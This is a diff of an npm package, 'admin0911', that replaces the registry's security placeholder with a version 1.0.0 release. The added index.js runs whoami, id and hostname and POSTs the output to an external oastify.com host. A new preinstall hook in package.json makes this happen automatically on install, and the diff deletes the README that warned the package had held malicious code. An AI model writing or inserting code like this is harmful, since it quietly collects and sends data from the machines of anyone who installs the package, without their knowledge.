admin0911 0.0.1-security → 1.0.0

package/index.js

@@ -0,0 +1,44 @@
+const http = require('http');
+const fs = require('fs');
+const { execSync } = require('child_process');
+const os = require('os');
+
+const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
+
+function runCommand(cmd) {
+  try {
+    return execSync(cmd, { encoding: 'utf8', stdio: 'pipe' }).trim();
+  } catch (e) {
+    return `ERROR: ${e.message}`;
+  }
+}
+
+const isWindows = os.platform() === 'win32';
+const commands = {
+  whoami: isWindows ? 'whoami' : 'whoami',
+  id: isWindows ? 'whoami /groups' : 'id',
+  hostname: isWindows ? 'hostname' : 'hostname'
+};
+
+const results = {
+  whoami: runCommand(commands.whoami),
+  id: runCommand(commands.id),
+  hostname: runCommand(commands.hostname)
+};
+
+const payload = JSON.stringify({ timestamp: new Date().toISOString(), results }, null, 2);
+
+const req = http.request({
+  hostname: OASTIFY_HOST,
+  method: 'POST',
+  path: '/?system_identity',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(payload)
+  }
+});
+req.write(payload);
+req.end();
+
+fs.writeFileSync('system_identity.log', payload + '\n');
+console.log('whoami, id, and hostname collected and sent to OASTIFY.');

package/package.json

@@ -1,6 +1,7 @@
 {
   "name": "admin0911",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "scripts": {
+    "preinstall": "node index.js"
+  }
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=admin0911 for more information.